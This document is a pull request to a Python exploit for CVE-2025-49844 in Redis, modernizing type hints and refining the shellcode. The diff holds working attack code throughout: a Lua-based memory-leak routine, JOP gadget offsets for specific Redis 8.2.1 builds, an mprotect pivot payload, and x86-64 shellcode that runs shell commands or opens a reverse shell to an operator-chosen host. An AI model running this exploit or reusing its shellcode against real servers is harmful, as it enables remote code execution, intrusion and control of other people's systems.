### PR TITLE
Modernize Python code and shellcode

### DIFF
--- a/src/cve_2025_49844/main.py
+++ b/src/cve_2025_49844/main.py
@@ -11,7 +11,8 @@ import logging
 from redis import Redis
 import random
 import struct
-from typing import cast, Any, Callable, List, Optional, Tuple
+from typing import cast, Any
+from collections.abc import Callable
 
 from .shared import (
     CClosure,
@@ -41,7 +42,7 @@ def import_target_modules() -> list[ModuleProtocol]:
 def u64_silly(value: int) -> int:
     return struct.unpack('<Q', struct.pack('B', value) * 8)[0]
 
-def create_shellcode(context: ShellcodeContext, module: ModuleProtocol) -> Optional[Tuple[bytes, int]]:
+def create_shellcode(context: ShellcodeContext, module: ModuleProtocol) -> tuple[bytes, int] | None:
     """Build shellcode for provided target module."""
     # Build the shellcode body.
     shellcode_body = context.body_callback(context)
@@ -87,11 +88,10 @@ def proto_encode_tstring(proto: Proto) -> str:
     # We want our string contents to be unique to avoid reuse, so randomize line values.
     proto.linedefined = random.randint(0, 0xFFFF_FFFF)
     proto.lastlinedefined = random.randint(0, 0xFFFF_FFFF)
-    encoded = lua_encode(proto.build_into_tstring_contents())
-    return encoded
+    return lua_encode(proto.build_into_tstring_contents())
 
 @dataclass
-class Proto(object):
+class Proto:
     p_k: int = field(default=0)
     p_code: int = field(default=0)
     p_p_p: int = field(default=0)
@@ -118,8 +118,8 @@ class Proto(object):
         # to control the `CommonHeader` and `k`.
         # If `tt` is examined, it will of course appear as a `TString`.
         b = self.build()
-        next = struct.unpack('<Q', b[0x00:0x08])[0]
-        if next != 0:
+        g_next = struct.unpack('<Q', b[0x00:0x08])[0]
+        if g_next != 0:
             logger.error('Proto::next is not non-null, not included in TString')
         p_k = struct.unpack('<Q', b[0x10:0x18])[0]
         if p_k != 0:
@@ -162,10 +162,10 @@ class Proto(object):
         return data
 
 @dataclass
-class ScriptOptions(object):
+class ScriptOptions:
     # Tuple of the opcodes address (`Proto::code` pointer)
     # and the number of opcodes (`Proto::sizecode`).
-    opcodes: Tuple[int, int] = field(default=(0, 0))
+    opcodes: tuple[int, int] = field(default=(0, 0))
 
     # Lua-encoded string with megabin contents.
     megabin: str = field(default='')
@@ -319,18 +319,16 @@ return nil
     """
 
     # Remove all comment lines.
-    script = '\n'.join([x for x in script.split('\n') if not x.lstrip().startswith('--')])
+    return '\n'.join([x for x in script.split('\n') if not x.lstrip().startswith('--')])
 
-    return script
-
-def parse_leaked_tostring_addr(contents: bytes) -> Optional[int]:
+def parse_leaked_tostring_addr(contents: bytes) -> int | None:
     if contents.startswith(b'function: '):
         return int(contents.lstrip(b'function: '), 16)
     if contents.startswith(b'table: '):
         return int(contents.lstrip(b'table: '), 16)
     return None
 
-def perform_leak(r: Redis, options: ScriptOptions, address: int, count: int, argv: Optional[List[bytes | str]] = None) -> Optional[bytes]:
+def perform_leak(r: Redis, options: ScriptOptions, address: int, count: int, argv: list[bytes | str] | None = None) -> bytes | None:
     options = dataclasses.replace(options, leak_addr=address)
     argv = argv if argv is not None else []
     data = b''
@@ -347,13 +345,12 @@ def perform_leak(r: Redis, options: ScriptOptions, address: int, count: int, arg
         # Sometimes the leak may fail and the script returns nil (None).
         if result is None:
             failcount += 1
-            if 3 < failcount:
+            if failcount > 3:
                 logger.error('Leak max failcount exceeded')
                 return None
             logger.error('Leak failed, trying again')
             continue
-        else:
-            failcount = 0
+        failcount = 0
 
         if not isinstance(result, bytes):
             logger.error(f'Failed to leak, returned non-bytes: 0x{options.leak_addr:x}')
@@ -368,15 +365,15 @@ def perform_leak(r: Redis, options: ScriptOptions, address: int, count: int, arg
 
         options.leak_addr += len(result)
 
-def leaked_addr(data: bytes) -> Optional[int]:
-    if 6 <= len(data):
+def leaked_addr(data: bytes) -> int | None:
+    if len(data) >= 6:
         data += b'\x00' * (8 - len(data))
         return int(struct.unpack('<Q', data)[0])
-    else:
-        logger.error(f'Did not leak at least 6 bytes')
-        return None
 
-def info_extract_version(info: Any) -> Optional[Tuple[str, str]]:
+    logger.error(f'Did not leak at least 6 bytes')
+    return None
+
+def info_extract_version(info: Any) -> tuple[str, str] | None:
     """Extract `redis_version` and `redis_build_id` INFO fields with strict type checking."""
     if not isinstance(info, dict):
         logger.error('INFO returned non-dict')
@@ -398,7 +395,7 @@ def info_extract_version(info: Any) -> Optional[Tuple[str, str]]:
     return (redis_version, redis_build_id)
 
 @dataclass
-class Opcodes(object):
+class Opcodes:
     opcodes: list[int]
 
     def __len__(self) -> int:
@@ -708,7 +705,7 @@ def perform(params: CommandParams | RshellParams):
     megabin += jopdata
 
     remaining = (0x1FF - 0x78) - len(jopdata)
-    assert(0 <= remaining)
+    assert(remaining >= 0)
     megabin += b'\x00' * remaining
     assert(len(megabin) == 0x1E7)
 
@@ -729,22 +726,22 @@ def perform(params: CommandParams | RshellParams):
         logger.error(f'Unexpected final output: {result}')
 
 @dataclass
-class CommandParams(object):
+class CommandParams:
     command: bytes
 
 @dataclass
-class RshellParams(object):
+class RshellParams:
     host: IPv4Address
     port: int
 
-def params_to_shellcode_body_callback(params: CommandParams | RshellParams) -> Callable[[ShellcodeContext], Optional[Tuple[bytes, int]]]:
+def params_to_shellcode_body_callback(params: CommandParams | RshellParams) -> Callable[[ShellcodeContext], tuple[bytes, int] | None]:
     match params:
         case CommandParams():
-            def body_callback(context: ShellcodeContext) -> Optional[Tuple[bytes, int]]:
+            def body_callback(context: ShellcodeContext) -> tuple[bytes, int] | None:
                 return create_shellcode_body_command(context, params.command)
             return body_callback
         case RshellParams():
-            def body_callback(context: ShellcodeContext) -> Optional[Tuple[bytes, int]]:
+            def body_callback(context: ShellcodeContext) -> tuple[bytes, int] | None:
                 endpoint = (params.host, params.port)
                 return create_shellcode_body_rshell(context, endpoint)
             return body_callback

--- a/src/cve_2025_49844/redis_8_2_1_alpine.py
+++ b/src/cve_2025_49844/redis_8_2_1_alpine.py
@@ -6,7 +6,6 @@ from iced_x86 import (
     MemoryOperand,
     Register,
 )
-from typing import Optional, Tuple
 
 from .shared import (
     CClosure,
@@ -24,7 +23,7 @@ def info() -> TargetInfo:
         redis_build_id='f5a80511e802827d',
     )
 
-def core_addrs(luaAlloc: int) -> Optional[CoreAddrs]:
+def core_addrs(luaAlloc: int) -> CoreAddrs | None:
     if luaAlloc & 0xFFF != 0xF10:
         return None
     redis_base = luaAlloc - 0x240F10
@@ -37,7 +36,7 @@ def core_addrs(luaAlloc: int) -> Optional[CoreAddrs]:
         pthread_create=pthread_create,
     )
 
-def create_shellcode(context: ShellcodeContext, shellcode: bytes, shellcode_body_address: int) -> Optional[Tuple[bytes, int]]:
+def create_shellcode(context: ShellcodeContext, shellcode: bytes, shellcode_body_address: int) -> tuple[bytes, int] | None:
     """Shellcode entry/exit stub for `redis:8.2.1-alpine`."""
     # Call `addReplyBool(client*, true)` to inform client socket that it can close.
     addReplyBool = context.addrs.redis_base + 0xDEB60
@@ -89,7 +88,7 @@ def create_shellcode(context: ShellcodeContext, shellcode: bytes, shellcode_body
 
     return (shellcode, entry)
 
-class jop(object):
+class jop:
     """JOP gadgets for `redis:8.2.1-alpine` build."""
     # mov rbx, rax ; mov rdi, rax ; call qword ptr [rax + 0x30]
     mov_rbx_rax__mov_rdi_rax__call_qword_ptr_rax_plus_0x30 = 0x155359
@@ -125,7 +124,7 @@ class jop(object):
     # mov rax, qword ptr [rax + 0x80] ; jmp rax
     mov_rax_qword_ptr_rax_p_0x80__jmp_rax = 0xffb31
 
-def build_pivot_payload(state: ExploitState) -> Tuple[bytes, bytes]:
+def build_pivot_payload(state: ExploitState) -> tuple[bytes, bytes]:
     redis_base = state.addrs.redis_base
 
     mprotect_arg_addr = state.shellcode_page
@@ -150,7 +149,7 @@ def build_pivot_payload(state: ExploitState) -> Tuple[bytes, bytes]:
         p_gclist=gadget5,
         p_env=mprotect_arg_prot,
         p_function=gadget0)
-    cclosure_bytes = cclosure.build(next=mprotect_arg_size)
+    cclosure_bytes = cclosure.build(g_next=mprotect_arg_size)
     assert(len(cclosure_bytes) == 0x28)
 
     # We use a gadget to set RBP so that another gadget may assign: `qword ptr RBP[-0x30] = 0`

--- a/src/cve_2025_49844/redis_8_2_1_alpine.py
+++ b/src/cve_2025_49844/redis_8_2_1_alpine.py
@@ -70,7 +70,7 @@ def create_shellcode(context: ShellcodeContext, shellcode: bytes, shellcode_body
         # Returning into: `evalGenericCommand`
         # Call `addReplyBool(client*, true)`
         Instr.create_reg_mem(Code.MOV_R64_RM64, Register.RDI, MemoryOperand(Register.RSP, displ=(0xC0 + 0x30))),
-        Instr.create_reg_i32(Code.MOV_R8_IMM8, Register.SIL, 1),
+        Instr.create_reg_i32(Code.MOV_R32_IMM32, Register.ESI, 1),
         Instr.create_reg_i64(Code.MOV_R64_IMM64, Register.RAX, addReplyBool),
         Instr.create_reg(Code.CALL_RM64, Register.RAX),
         # Jump into epilogue gadget to restore registers and return.

--- a/src/cve_2025_49844/redis_8_2_1_bookworm.py
+++ b/src/cve_2025_49844/redis_8_2_1_bookworm.py
@@ -66,7 +66,7 @@ def create_shellcode(context: ShellcodeContext, shellcode: bytes, shellcode_body
         # Returning into: `evalGenericCommand`
         # Call `addReplyBool(client*, true)`
         Instr.create_reg_mem(Code.MOV_R64_RM64, Register.RDI, MemoryOperand(Register.RSP, displ=0xA0)),
-        Instr.create_reg_i32(Code.MOV_R8_IMM8, Register.SIL, 1),
+        Instr.create_reg_i32(Code.MOV_R32_IMM32, Register.ESI, 1),
         Instr.create_reg_i64(Code.MOV_R64_IMM64, Register.RAX, addReplyBool),
         Instr.create_reg(Code.CALL_RM64, Register.RAX),
         # Set: RBX = lua_State*
@@ -76,16 +76,16 @@ def create_shellcode(context: ShellcodeContext, shellcode: bytes, shellcode_body
         Instr.create_reg_i64(Code.MOV_R64_IMM64, Register.RDX, curr_run_ctx),
         Instr.create_mem_reg(Code.MOV_RM64_R64, MemoryOperand(Register.RDX), Register.RCX),
         # Ensure RAX is non-zero.
-        Instr.create_reg_i32(Code.MOV_R8_IMM8, Register.AL, 1),
+        Instr.create_reg_i32(Code.MOV_R32_IMM32, Register.EAX, 1),
         # iced-x86 won't let us emit RET here, so do it below.
-        # Instr.create(Code.RETND),
+        Instr.create(Code.RETNQ),
     ]
 
     # TODO: Actually clean up after ourselves?
 
     encoder = BlockEncoder(64)
     encoder.add_many(instrs)
-    encoded_bytes = encoder.encode(0) + b'\xC3'
+    encoded_bytes = encoder.encode(0)
 
     shellcode += encoded_bytes
 

--- a/src/cve_2025_49844/redis_8_2_1_bookworm.py
+++ b/src/cve_2025_49844/redis_8_2_1_bookworm.py
@@ -6,7 +6,6 @@ from iced_x86 import (
     MemoryOperand,
     Register,
 )
-from typing import Optional, Tuple
 
 from .shared import (
     CClosure,
@@ -24,7 +23,7 @@ def info() -> TargetInfo:
         redis_build_id='fcae35583392417f',
     )
 
-def core_addrs(luaAlloc: int) -> Optional[CoreAddrs]:
+def core_addrs(luaAlloc: int) -> CoreAddrs | None:
     if luaAlloc & 0xFFF != 0xE10:
         return None
     redis_base = luaAlloc - 0x21BE10
@@ -37,7 +36,7 @@ def core_addrs(luaAlloc: int) -> Optional[CoreAddrs]:
         pthread_create=pthread_create,
     )
 
-def create_shellcode(context: ShellcodeContext, shellcode: bytes, shellcode_body_address: int) -> Optional[Tuple[bytes, int]]:
+def create_shellcode(context: ShellcodeContext, shellcode: bytes, shellcode_body_address: int) -> tuple[bytes, int] | None:
     """Shellcode entry/exit stub for `redis:8.2.1-bookworm`."""
     # Call `addReplyBool(client*, true)` to inform client socket that it can close.
     addReplyBool = context.addrs.redis_base + 0xD6890
@@ -92,7 +91,7 @@ def create_shellcode(context: ShellcodeContext, shellcode: bytes, shellcode_body
 
     return (shellcode, entry)
 
-class jop(object):
+class jop:
     """JOP gadgets for `redis:8.2.1-bookworm` build."""
     # mov rbx, rax ; mov rdi, rax ; call qword ptr [rax + 0x30]
     mov_rbx_rax__mov_rdi_rax__call_qword_ptr_rax_plus_0x30 = 0x1451ac
@@ -118,7 +117,7 @@ class jop(object):
     # mov rax, qword ptr [rax + 0x80] ; jmp rax
     mov_rax_qword_ptr_rax_p_0x80__jmp_rax = 0xf21f1
 
-def build_pivot_payload(state: ExploitState) -> Tuple[bytes, bytes]:
+def build_pivot_payload(state: ExploitState) -> tuple[bytes, bytes]:
     redis_base = state.addrs.redis_base
 
     mprotect_arg_addr = state.shellcode_page
@@ -141,7 +140,7 @@ def build_pivot_payload(state: ExploitState) -> Tuple[bytes, bytes]:
         p_gclist=gadget3,
         p_env=mprotect_arg_prot,
         p_function=gadget0)
-    cclosure_bytes = cclosure.build(next=mprotect_arg_size)
+    cclosure_bytes = cclosure.build(g_next=mprotect_arg_size)
     assert(len(cclosure_bytes) == 0x28)
 
     # Build the JOP-specific parts of the megabin.

--- a/src/cve_2025_49844/shared.py
+++ b/src/cve_2025_49844/shared.py
@@ -1,17 +1,18 @@
 from __future__ import annotations
 from dataclasses import dataclass, field
 import struct
-from typing import Callable, Optional, Protocol, Tuple
+from typing import Protocol
+from collections.abc import Callable
 
 @dataclass
-class CoreAddrs(object):
+class CoreAddrs:
     redis_base: int
     luaAlloc: int
     mprotect: int
     pthread_create: int
 
 @dataclass
-class ExploitState(object):
+class ExploitState:
     target: TargetInfo
     addrs: CoreAddrs
     megabin_address: int
@@ -19,14 +20,14 @@ class ExploitState(object):
     shellcode_page: int
 
 @dataclass
-class ShellcodeContext(object):
+class ShellcodeContext:
     origin: int
     addrs: CoreAddrs
     luastate: int
-    body_callback: Callable[[ShellcodeContext], Optional[Tuple[bytes, int]]]
+    body_callback: Callable[[ShellcodeContext], tuple[bytes, int] | None]
 
 @dataclass
-class TargetInfo(object):
+class TargetInfo:
     name: str
     redis_version: str
     redis_build_id: str
@@ -35,29 +36,29 @@ class ModuleProtocol(Protocol):
     def info(self) -> TargetInfo:
         ...
 
-    def core_addrs(self, luaAlloc: int) -> Optional[CoreAddrs]:
+    def core_addrs(self, luaAlloc: int) -> CoreAddrs | None:
         ...
 
     def create_shellcode(
         self,
         context: ShellcodeContext,
         shellcode: bytes,
-        shellcode_body_address: int) -> Optional[Tuple[bytes, int]]:
+        shellcode_body_address: int) -> tuple[bytes, int] | None:
         ...
 
-    def build_pivot_payload(self, state: ExploitState) -> Tuple[bytes, bytes]:
+    def build_pivot_payload(self, state: ExploitState) -> tuple[bytes, bytes]:
         ...
 
 @dataclass
-class CClosure(object):
+class CClosure:
     nupvalues: int = field(default=0)
     p_gclist: int = field(default=0)
     p_env: int = field(default=0)
     p_function: int = field(default=0)
 
-    def build(self, next: int = 0) -> bytes:
+    def build(self, g_next: int = 0) -> bytes:
         data = b''
-        data += struct.pack('<Q', next)
+        data += struct.pack('<Q', g_next)
         data += b'\x06'     # tt
         data += b'\x00'     # marked
         data += b'\x01'     # isC

--- a/src/cve_2025_49844/shellcode.py
+++ b/src/cve_2025_49844/shellcode.py
@@ -9,21 +9,20 @@ from iced_x86 import (
 from ipaddress import IPv4Address
 import logging
 import struct
-from typing import Optional, Tuple
 
 from .shared import ShellcodeContext
 from .util import u64_le
 
 logger = logging.getLogger(__name__)
 
-def add_label(id: int, instruction: Instr) -> Instr:
+def add_label(label_id: int, instruction: Instr) -> Instr:
     """Helper function for iced-x86 instructions."""
-    instruction.ip = id
+    instruction.ip = label_id
     return instruction
 
 # Thanks to Andriy Brukhovetskyy (doomedraven) for the reference.
 # See: https://shell-storm.org/shellcode/files/shellcode-871.html
-def create_shellcode_body_rshell(context: ShellcodeContext, endpoint: Tuple[IPv4Address, int]) -> Optional[Tuple[bytes, int]]:
+def create_shellcode_body_rshell(context: ShellcodeContext, endpoint: tuple[IPv4Address, int]) -> tuple[bytes, int] | None:
     (ip, port) = endpoint
 
     shellcode = b''
@@ -159,11 +158,11 @@ def create_shellcode_body_rshell(context: ShellcodeContext, endpoint: Tuple[IPv4
 
     return (shellcode, entry)
 
-def create_shellcode_body_command(context: ShellcodeContext, command: bytes) -> Optional[Tuple[bytes, int]]:
+def create_shellcode_body_command(context: ShellcodeContext, command: bytes) -> tuple[bytes, int] | None:
     if b'\x00' in command:
         logger.error('Shell command cannot contain null bytes')
         return None
-    if 0x800 < len(command):
+    if len(command) > 0x800:
         logger.error('Shell command is too large')
         return None
 

--- a/src/cve_2025_49844/shellcode.py
+++ b/src/cve_2025_49844/shellcode.py
@@ -71,39 +71,39 @@ def create_shellcode_body_rshell(context: ShellcodeContext, endpoint: tuple[IPv4
 
     instrs = [
         # sys_fork
-        Instr.create_reg_i64(Code.MOV_R64_IMM64, Register.RAX, 0x39),
+        Instr.create_reg_i32(Code.MOV_R32_IMM32, Register.EAX, 0x39),
         Instr.create(Code.SYSCALL),
 
         # Only continue if child process.
-        Instr.create_reg_reg(Code.TEST_RM64_R64, Register.RAX, Register.RAX),
+        Instr.create_reg_reg(Code.TEST_RM32_R32, Register.EAX, Register.EAX),
         Instr.create_branch(Code.JNE_REL32_64, label_parent),
 
         # sys_socket(AF_INET, SOCK_STREAM, 0)
-        Instr.create_reg_i64(Code.MOV_R64_IMM64, Register.RAX, 0x29),
-        Instr.create_reg_i64(Code.MOV_R64_IMM64, Register.RDI, 0x2),
-        Instr.create_reg_i64(Code.MOV_R64_IMM64, Register.RSI, 0x1),
-        Instr.create_reg_reg(Code.XOR_R64_RM64, Register.RDX, Register.RDX),
+        Instr.create_reg_i32(Code.MOV_R32_IMM32, Register.EAX, 0x29),
+        Instr.create_reg_i32(Code.MOV_R32_IMM32, Register.EDI, 0x2),
+        Instr.create_reg_i32(Code.MOV_R32_IMM32, Register.ESI, 0x1),
+        Instr.create_reg_reg(Code.XOR_RM32_R32, Register.EDX, Register.EDX),
         Instr.create(Code.SYSCALL),
 
         # Preserve socket descriptor in RDI.
         Instr.create_reg_reg(Code.XCHG_R64_RAX, Register.RDI, Register.RAX),
 
         # sys_connect
-        Instr.create_reg_i64(Code.MOV_R64_IMM64, Register.RAX, 0x2A),
+        Instr.create_reg_i32(Code.MOV_R32_IMM32, Register.EAX, 0x2A),
         Instr.create_reg_mem(Code.LEA_R64_M, Register.RSI, MemoryOperand(Register.RIP, displ=(sockaddr_offset - entry))),
-        Instr.create_reg_i64(Code.MOV_R64_IMM64, Register.RDX, 0x10),
+        Instr.create_reg_i32(Code.MOV_R32_IMM32, Register.EDX, 0x10),
         Instr.create(Code.SYSCALL),
 
         # Exit gracefully if sys_connect failed.
-        Instr.create_reg_reg(Code.TEST_RM64_R64, Register.RAX, Register.RAX),
+        Instr.create_reg_reg(Code.TEST_RM32_R32, Register.EAX, Register.EAX),
         Instr.create_branch(Code.JNE_REL32_64, label_exit),
 
         # sys_dup2 for stdio into socket fd.
-        Instr.create_reg_i64(Code.MOV_R64_IMM64, Register.RSI, 3),
+        Instr.create_reg_i32(Code.MOV_R32_IMM32, Register.ESI, 3),
         add_label(label_dup2, Instr.create_reg(Code.DEC_RM64, Register.RSI)),
-        Instr.create_reg_i64(Code.MOV_R64_IMM64, Register.RAX, 0x21),
+        Instr.create_reg_i32(Code.MOV_R32_IMM32, Register.EAX, 0x21),
         Instr.create(Code.SYSCALL),
-        Instr.create_branch(Code.JNE_REL32_64, label_dup2),
+        Instr.create_branch(Code.JNE_REL8_64, label_dup2),
 
         # TODO: Implement password for fun?
 
@@ -111,48 +111,47 @@ def create_shellcode_body_rshell(context: ShellcodeContext, endpoint: tuple[IPv4
         Instr.create_reg_mem(Code.LEA_R64_M, Register.RDI, MemoryOperand(Register.RIP, displ=(bin_sh_offset - entry))),
         Instr.create_reg_mem(Code.LEA_R64_M, Register.RSI, MemoryOperand(Register.RIP, displ=(argv_offset - entry))),
         Instr.create_reg_mem(Code.LEA_R64_M, Register.RDX, MemoryOperand(Register.RIP, displ=(envp_offset - entry))),
-        Instr.create_reg_i32(Code.MOV_R64_IMM64, Register.RAX, 0x3B),
+        Instr.create_reg_i32(Code.MOV_R32_IMM32, Register.EAX, 0x3B),
         Instr.create(Code.SYSCALL),
 
         # sys_wait4
         # We already have the pid in RDI.
-        add_label(label_wait4, Instr.create_reg_i32(Code.MOV_R64_IMM64, Register.RAX, 0x3D)),
-        Instr.create_reg_reg(Code.XOR_RM64_R64, Register.RSI, Register.RSI),
-        Instr.create_reg_reg(Code.XOR_RM64_R64, Register.RDX, Register.RDX),
-        Instr.create_reg_reg(Code.XOR_RM64_R64, Register.RCX, Register.RCX),
+        add_label(label_wait4, Instr.create_reg_i32(Code.MOV_R32_IMM32, Register.EAX, 0x3D)),
+        Instr.create_reg_reg(Code.XOR_RM32_R32, Register.ESI, Register.ESI),
+        Instr.create_reg_reg(Code.XOR_RM32_R32, Register.EDX, Register.EDX),
+        Instr.create_reg_reg(Code.XOR_RM32_R32, Register.R10D, Register.R10D),
         Instr.create(Code.SYSCALL),
 
         # sys_exit(0)
-        add_label(label_exit, Instr.create_reg_i32(Code.MOV_R64_IMM64, Register.RAX, 0x3C)),
-        Instr.create_reg_reg(Code.XOR_R64_RM64, Register.RDI, Register.RDI),
+        add_label(label_exit, Instr.create_reg_i32(Code.MOV_R32_IMM32, Register.EAX, 0x3C)),
+        Instr.create_reg_reg(Code.XOR_RM32_R32, Register.EDI, Register.EDI),
         Instr.create(Code.SYSCALL),
 
         # sys_getpid
         # Parent logic: Check if we are the init process, and if so spawn a thread to sys_wait4 on the child fork.
         # Preserve child process ID in RDI.
-        add_label(label_parent, Instr.create_reg_reg(Code.MOV_RM64_R64, Register.RDI, Register.RAX)),
-        Instr.create_reg_i32(Code.MOV_R64_IMM64, Register.RAX, 0x27),
+        add_label(label_parent, Instr.create_reg_reg(Code.MOV_R32_IMM32, Register.EDI, Register.EAX)),
+        Instr.create_reg_i32(Code.MOV_R32_IMM32, Register.EAX, 0x27),
         Instr.create(Code.SYSCALL),
 
         # If pid != 1 then we don't need to sys_wait4.
-        Instr.create_reg_i32(Code.CMP_RAX_IMM32, Register.RAX, 1),
+        Instr.create_reg_i32(Code.CMP_EAX_IMM32, Register.EAX, 1),
         Instr.create_branch(Code.JNE_REL32_64, label_return),
 
         # Call `pthread_create` to `sys_wait4` on the child process and avoid zombies.
         Instr.create_reg_i64(Code.MOV_R64_IMM64, Register.RAX, pthread_create),
-        Instr.create_reg_reg(Code.MOV_RM64_R64, Register.RCX, Register.RDI), # RCX = child pid
+        Instr.create_reg_reg(Code.MOV_RM32_R32, Register.ECX, Register.EDI), # RCX = child pid
         Instr.create_reg_mem(Code.LEA_R64_M, Register.RDI, MemoryOperand(Register.RIP, displ=(pthread_id_offset - entry))),
-        Instr.create_reg_reg(Code.XOR_RM64_R64, Register.RSI, Register.RSI),
+        Instr.create_reg_reg(Code.XOR_RM32_R32, Register.ESI, Register.ESI),
         Instr.create_reg_mem(Code.LEA_R64_M, Register.RDX, MemoryOperand(Register.RIP, displ=label_wait4)),
         Instr.create_reg(Code.CALL_RM64, Register.RAX),
 
-        # NOP here because we are a branch target and iced-x86 won't let us RET.
-        add_label(label_return, Instr.create(Code.NOPQ)),
+        add_label(label_return, Instr.create(Code.RETNQ)),
     ]
 
     encoder = BlockEncoder(64)
     encoder.add_many(instrs)
-    encoded_bytes = encoder.encode(0) + b'\xC3'
+    encoded_bytes = encoder.encode(0)
 
     shellcode += encoded_bytes
 
@@ -212,11 +211,11 @@ def create_shellcode_body_command(context: ShellcodeContext, command: bytes) -> 
     # These instructions aren't space effecient but we aren't very space constrained. :)
     instrs = [
         # sys_fork
-        Instr.create_reg_i64(Code.MOV_R64_IMM64, Register.RAX, 0x39),
+        Instr.create_reg_i32(Code.MOV_R32_IMM32, Register.EAX, 0x39),
         Instr.create(Code.SYSCALL),
 
         # Only execve if child process.
-        Instr.create_reg_reg(Code.TEST_RM64_R64, Register.RAX, Register.RAX),
+        Instr.create_reg_reg(Code.TEST_RM32_R32, Register.EAX, Register.EAX),
         Instr.create_branch(Code.JNE_REL32_64, label_parent),
 
         # sys_execve
@@ -224,19 +223,19 @@ def create_shellcode_body_command(context: ShellcodeContext, command: bytes) -> 
         Instr.create_reg_mem(Code.LEA_R64_M, Register.RDI, MemoryOperand(Register.RIP, displ=(bin_sh_offset - entry))),
         Instr.create_reg_mem(Code.LEA_R64_M, Register.RSI, MemoryOperand(Register.RIP, displ=(argv_offset - entry))),
         Instr.create_reg_mem(Code.LEA_R64_M, Register.RDX, MemoryOperand(Register.RIP, displ=(envp_offset - entry))),
-        Instr.create_reg_i32(Code.MOV_R64_IMM64, Register.RAX, 0x3B),
+        Instr.create_reg_i32(Code.MOV_R32_IMM32, Register.EAX, 0x3B),
         Instr.create(Code.SYSCALL),
 
         # sys_wait4
         # We already have the pid in RDI.
-        add_label(label_wait4, Instr.create_reg_i32(Code.MOV_R64_IMM64, Register.RAX, 0x3D)),
-        Instr.create_reg_reg(Code.XOR_RM64_R64, Register.RSI, Register.RSI),
-        Instr.create_reg_reg(Code.XOR_RM64_R64, Register.RDX, Register.RDX),
-        Instr.create_reg_reg(Code.XOR_RM64_R64, Register.RCX, Register.RCX),
+        add_label(label_wait4, Instr.create_reg_i32(Code.MOV_R32_IMM32, Register.EAX, 0x3D)),
+        Instr.create_reg_reg(Code.XOR_RM32_R32, Register.ESI, Register.ESI),
+        Instr.create_reg_reg(Code.XOR_RM32_R32, Register.EDX, Register.EDX),
+        Instr.create_reg_reg(Code.XOR_RM32_R32, Register.R10D, Register.R10D),
         Instr.create(Code.SYSCALL),
 
         # sys_exit(0)
-        Instr.create_reg_i32(Code.MOV_R64_IMM64, Register.RAX, 0x3C),
+        Instr.create_reg_i32(Code.MOV_R32_IMM32, Register.EAX, 0x3C),
         Instr.create_reg_reg(Code.XOR_R64_RM64, Register.RDI, Register.RDI),
         Instr.create(Code.SYSCALL),
 
@@ -244,28 +243,27 @@ def create_shellcode_body_command(context: ShellcodeContext, command: bytes) -> 
         # Parent logic: Check if we are the init process, and if so spawn a thread to sys_wait4 on the child fork.
         # Preserve child process ID in RDI.
         add_label(label_parent, Instr.create_reg_reg(Code.MOV_RM64_R64, Register.RDI, Register.RAX)),
-        Instr.create_reg_i32(Code.MOV_R64_IMM64, Register.RAX, 0x27),
+        Instr.create_reg_i32(Code.MOV_R32_IMM32, Register.EAX, 0x27),
         Instr.create(Code.SYSCALL),
 
         # If pid != 1 then we don't need to sys_wait4.
-        Instr.create_reg_i32(Code.CMP_RAX_IMM32, Register.RAX, 1),
+        Instr.create_reg_i32(Code.CMP_EAX_IMM32, Register.EAX, 1),
         Instr.create_branch(Code.JNE_REL32_64, label_return),
 
         # Call `pthread_create` to `sys_wait4` on the child process and avoid zombies.
         Instr.create_reg_i64(Code.MOV_R64_IMM64, Register.RAX, pthread_create),
         Instr.create_reg_reg(Code.MOV_RM64_R64, Register.RCX, Register.RDI), # RCX = child pid
         Instr.create_reg_mem(Code.LEA_R64_M, Register.RDI, MemoryOperand(Register.RIP, displ=(pthread_id_offset - entry))),
-        Instr.create_reg_reg(Code.XOR_RM64_R64, Register.RSI, Register.RSI),
+        Instr.create_reg_reg(Code.XOR_RM32_R32, Register.ESI, Register.ESI),
         Instr.create_reg_mem(Code.LEA_R64_M, Register.RDX, MemoryOperand(Register.RIP, displ=label_wait4)),
         Instr.create_reg(Code.CALL_RM64, Register.RAX),
 
-        # NOP here because we are a branch target and iced-x86 won't let us RET.
-        add_label(label_return, Instr.create(Code.NOPQ)),
+        add_label(label_return, Instr.create(Code.RETNQ)),
     ]
 
     encoder = BlockEncoder(64)
     encoder.add_many(instrs)
-    encoded_bytes = encoder.encode(0) + b'\xC3'
+    encoded_bytes = encoder.encode(0)
 
     shellcode += encoded_bytes
 

--- a/src/cve_2025_49844/util.py
+++ b/src/cve_2025_49844/util.py
@@ -1,11 +1,12 @@
 from __future__ import annotations
 import struct
-from typing import Callable, Optional, TypeVar
+from typing import TypeVar
+from collections.abc import Callable
 
 T = TypeVar('T')
 U = TypeVar('U')
 
-def optional_map(value: Optional[T], f: Callable[[T], Optional[U]]) -> Optional[U]:
+def optional_map(value: T | None, f: Callable[[T], U | None]) -> U | None:
     if value is None:
         return None
     return f(value)


### PR DESCRIPTION
Since in pyproject.toml, python 3.13 is used, then some typing methods are deprecated. I modernized some typing part and format a bit code.

As for shellcode part, iced allow us to run RET, but with `RETNQ`, rather than `RETND`, that's for 32-bit. In syscall calling process, the 4th argument is passed by R10, rather than RCX. Some 32-bit immediate could use `MOV R32, IMM` to save a bit space. 